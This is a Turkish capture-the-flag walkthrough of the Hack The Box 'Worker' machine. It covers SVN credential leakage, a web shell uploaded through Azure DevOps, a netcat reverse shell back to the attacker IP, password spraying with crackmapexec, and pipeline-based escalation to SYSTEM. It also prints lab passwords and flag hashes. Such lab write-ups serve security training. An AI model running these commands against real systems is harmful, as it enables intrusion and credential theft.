| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Worker - HTB | Orta | Windows |
Walkthrough
nmap taraması ile başlayalım.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
svn tespit ettikten sonra enum yapmaya başladım aynı zamanda vsman açık bu bir kullanıcı tespit edebilirsek bağlantı kurabileceğimiz anlamına geliyor. svn olması ile bir yazılım projesi olabileceğini bende düşündürdü. svn ile ilgili incelemelerim aşağıda
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn ls svn://10.10.10.203
dimension.worker.htb/
moved.txt
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# s
s: command not found
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls 127 ⨯
10.10.10.203 dimension.worker.htb gobuster1 gobuster2 moved.txt
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
/etc/hosts dosyamı güncellendikten sonra svn'deki diğer versiyonları kontrol edereke devam etmeye başladım.
┌──(root💀kali)-[~/oscp/htb/Worker/dimension.worker.htb]
└─# cd ..
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn up -r 2
Updating '.':
D moved.txt
A deploy.ps1
Updated to revision 2.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls -al
total 32
drwxr-xr-x 5 root root 4096 Aug 10 06:31 .
drwxr-xr-x 26 root root 4096 Aug 10 05:10 ..
drwxr-xr-x 4 root root 4096 Aug 10 05:28 10.10.10.203
-rw-r--r-- 1 root root 271 Aug 10 06:31 deploy.ps1
drwxr-xr-x 4 root root 4096 Aug 10 06:19 dimension.worker.htb
-rw-r--r-- 1 root root 1065 Aug 10 06:19 gobuster1
-rw-r--r-- 1 root root 1093 Aug 10 06:21 gobuster2
drwxr-xr-x 4 root root 4096 Aug 10 06:18 .svn
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Harika bir kullanıcı tespit ettik vsman'a bağlanmayı denedim ancak başarılı olamadım. Bunun üzerine http://devops.worker.htb adresine gittiğimde çıkan basic authentication'a nathen:wendel98 bilgileri ile giriş yapabildim. Sağlık bakanlığında yazılımcı olarak çalışırken süreç takibi için TFS kullanırdık. Microsoft'uy seviyorum ve Azur üzerinde yine benzer bir TFS var. Tasklar gelmiş bu tasklara uygun commitler girilmiş. Amacımın bu projelerden birine reverse atıp makineye bağlantı kurmak olduğu çok açıktı.
Bir proje seçtim ve yeni bir branch oluşturdum daha sonrasında bunu merge ettim böylece web shel'imi yükleyebildim. Bununla alakalı ekran görünüsü aşağıda yer almaktadır.
Şimdi web shelli görüntüleyelim. Bunun için /etc/hosts dosyamı tekrardan güncelledim.
Kalimde bir smb başlattım ve karşı makineye nc.exe attım. Daha sonrasında reverse aldım.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# /usr/local/bin/smbserver.py KUDAY . -smb2support 130 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.203,52693)
[*] AUTHENTICATE_MESSAGE (\,WORKER)
[*] User WORKER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:KUDAY)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KUDAY)
[*] Closing down connection (10.10.10.203,52693)
[*] Remaining connections []
nc.exe'yi göndermek için kullandığım payload: copy \\10.10.14.5\KUDAY\nc.exe C:\Windows\Temp\nc.exe
C:\Windows\Temp\nc.exe -e cmd.exe 10.10.14.5 443
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.5] from alpha.worker.htb [10.10.10.203] 52695
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
w:\sites\alpha.worker.htb>
Bu aşamdan sonra çokça inceleme yaptım otomatik scriptleri kullandım ancak işe yarar bir şey çıkmadı. Daha sonrasında w:\ diskinde manuel incelemeler yapmaya başladım. Powershell başlatım aşağıdaki komutu girdiğimde ilginç sonuçlar aldım.
Get-ChildItem -Recurse | Select-String "pass" -List | Select Path
...
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.svg
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.ttf
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.eot
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.svg
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.ttf
W:\svnrepos\www\conf\passwd
W:\svnrepos\www\conf\svnserve.conf
W:\svnrepos\www\db\revs\0\1
W:\svnrepos\www\db\revs\0\3
W:\svnrepos\www\hooks\post-commit.tmpl
W:\svnrepos\www\hooks\post-lock.tmpl
W:\svnrepos\www\hooks\post-revprop-change.tmpl
W:\svnrepos\www\hooks\post-unlock.tmpl
W:\svnrepos\www\hooks\pre-commit.tmpl
W:\svnrepos\www\hooks\pre-lock.tmpl
W:\svnrepos\www\hooks\pre-revprop-change.tmpl
W:\svnrepos\www\hooks\pre-unlock.tmpl
W:\svnrepos\www\hooks\start-commit.tmpl
passwd dosyasını okuduğumda kullanıcı adları ve parolalar buldum. Hemen bunları test edelim.
PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
Hızlıca wordlistlerimi oluşturdum.
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat cred
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat convert.py
dosya = open("cred")
cred = dosya.read().split("\n")
dosya.close()
username=[]
password=[]
dosya4username = open("username","a")
dosya4password = open("password","a")
for i in cred:
dosya4username.write(i.replace("="," ").split()[0]+"\n")
dosya4password.write(i.replace("="," ").split()[1]+"\n")
dosya4username.close()
dosya4password.close()
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# python3 convert.py
Traceback (most recent call last):
File "/root/oscp/htb/Worker/Users/convert.py", line 11, in <module>
dosya4username.write(i.replace("="," ").split()[0]+"\n")
IndexError: list index out of range
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat username 1 ⨯
nathen
nichin
nichin
noahip
nuahip
oakhol
owehol
paihol
parhol
pathop
pauhor
payhos
perhou
peyhou
phihou
quehub
quihud
rachul
raehun
ramhun
ranhut
rebhyd
reeinc
reeing
reiing
renipr
rhiire
riairv
ricisa
robish
robisl
robive
ronkay
rubkei
rupkel
ryakel
sabken
samken
sapket
sarkil
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat password
wendel98
fqerfqerf
asifhiefh
player
wkjdnw
bxwdjhcue
supersecret
painfulcode
gitcommit
iliketomoveit
nowayjose
icanjive
elvisisalive
ineedvacation
pokemon
pickme
kindasecure
guesswho
idontknow
thisis
getting
rediculous
iagree
tosomepoint
isthisenough
dummy
users
canyou
seewhich
onesare
wolves11
andwhich
onesare
the
sheeps
imtired
drjones
aqua
hamburger
friday
Orada pythonda bir hata var ancak programın sonunda gerçekleşen bir durum, pythondan anlayabnlar anlayacaktır. Dosya okuma işlemi yaparken son satırda boş elemanlar olmasından kaynaklanıyor. Korkulacak bir şey yok. Şimdi deneyelim!
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# crackmapexec winrm -u username -p password --no-bruteforce 10.10.10.203
WINRM 10.10.10.203 5985 NONE [*] None (name:10.10.10.203) (domain:None)
WINRM 10.10.10.203 5985 NONE [*] http://10.10.10.203:5985/wsman
WINRM 10.10.10.203 5985 NONE [-] None\nathen:wendel98
WINRM 10.10.10.203 5985 NONE [-] None\nichin:fqerfqerf
WINRM 10.10.10.203 5985 NONE [-] None\nichin:asifhiefh
WINRM 10.10.10.203 5985 NONE [-] None\noahip:player
WINRM 10.10.10.203 5985 NONE [-] None\nuahip:wkjdnw
WINRM 10.10.10.203 5985 NONE [-] None\oakhol:bxwdjhcue
WINRM 10.10.10.203 5985 NONE [-] None\owehol:supersecret
WINRM 10.10.10.203 5985 NONE [-] None\paihol:painfulcode
WINRM 10.10.10.203 5985 NONE [-] None\parhol:gitcommit
WINRM 10.10.10.203 5985 NONE [-] None\pathop:iliketomoveit
WINRM 10.10.10.203 5985 NONE [-] None\pauhor:nowayjose
WINRM 10.10.10.203 5985 NONE [-] None\payhos:icanjive
WINRM 10.10.10.203 5985 NONE [-] None\perhou:elvisisalive
WINRM 10.10.10.203 5985 NONE [-] None\peyhou:ineedvacation
WINRM 10.10.10.203 5985 NONE [-] None\phihou:pokemon
WINRM 10.10.10.203 5985 NONE [-] None\quehub:pickme
WINRM 10.10.10.203 5985 NONE [-] None\quihud:kindasecure
WINRM 10.10.10.203 5985 NONE [-] None\rachul:guesswho
WINRM 10.10.10.203 5985 NONE [-] None\raehun:idontknow
WINRM 10.10.10.203 5985 NONE [-] None\ramhun:thisis
WINRM 10.10.10.203 5985 NONE [-] None\ranhut:getting
WINRM 10.10.10.203 5985 NONE [-] None\rebhyd:rediculous
WINRM 10.10.10.203 5985 NONE [-] None\reeinc:iagree
WINRM 10.10.10.203 5985 NONE [-] None\reeing:tosomepoint
WINRM 10.10.10.203 5985 NONE [-] None\reiing:isthisenough
WINRM 10.10.10.203 5985 NONE [-] None\renipr:dummy
WINRM 10.10.10.203 5985 NONE [-] None\rhiire:users
WINRM 10.10.10.203 5985 NONE [-] None\riairv:canyou
WINRM 10.10.10.203 5985 NONE [-] None\ricisa:seewhich
WINRM 10.10.10.203 5985 NONE [-] None\robish:onesare
WINRM 10.10.10.203 5985 NONE [+] None\robisl:wolves11 (Pwn3d!)
robisl:wolves11
Harika! evil-winrm ile bağlantı kuralım.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# evil-winrm -i 10.10.10.203 -u robisl -p wolves11 130 ⨯
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..
*Evil-WinRM* PS C:\Users\robisl> ls
Directory: C:\Users\robisl
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/5/2020 7:32 PM Desktop
d-r--- 4/4/2020 11:35 PM Documents
d-r--- 9/15/2018 9:12 AM Downloads
d-r--- 9/15/2018 9:12 AM Favorites
d-r--- 9/15/2018 9:12 AM Links
d-r--- 9/15/2018 9:12 AM Music
d-r--- 9/15/2018 9:12 AM Pictures
d----- 9/15/2018 9:12 AM Saved Games
d-r--- 9/15/2018 9:12 AM Videos
cd*Evil-WinRM* PS C:\Users\robisl> cd Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls
Directory: C:\Users\robisl\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/10/2021 8:59 PM 34 user.txt
cat*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
5455ed43a205185208157dcc76502d43
*Evil-WinRM* PS C:\Users\robisl\Desktop>
Daha sonrasında bu kullanıcı ile azur'a tekrar bağlandım ve daha farklı bir proeje gördüm. Pipelines oluşturabildiğimi fark ettim. Devops kısmı çok hakim olduğum bir alan değil bunu başta belirtmemde fayda var o yüzden emin olmadığım bazı şeylerden burada bahsetmeyeceğim. Pentester academy'nin eğitimlerii bekliyorum 🙂 Ancak piplines aracılığı ile işletim sistemi seviyesinde kod çalıştırabildiğimi biliyorum. Aşağıdaki şekilde bir kod çalıştırdığımda root haklarında (sözüm ona makine windows) reverse alabildim.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443 1 ⨯
listening on [any] 443 ...
connect to [10.10.14.5] from devops.worker.htb [10.10.10.203] 50788
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
W:\agents\agent11\_work\8\s>whoami
whoami
nt authority\system
W:\agents\agent11\_work\8\s>c:
c:
C:\>dir "*root*.txt" /s /p
dir "*root*.txt" /s /p
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of C:\Users\Administrator\Desktop
2021-08-10 20:59 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 10 384 883 712 bytes free
C:\>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dtype root.txt
dtype root.txt
'dtype' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
fdae81646ff993d7125b423f6fd93f8d
İlk Yorumu Siz Yapın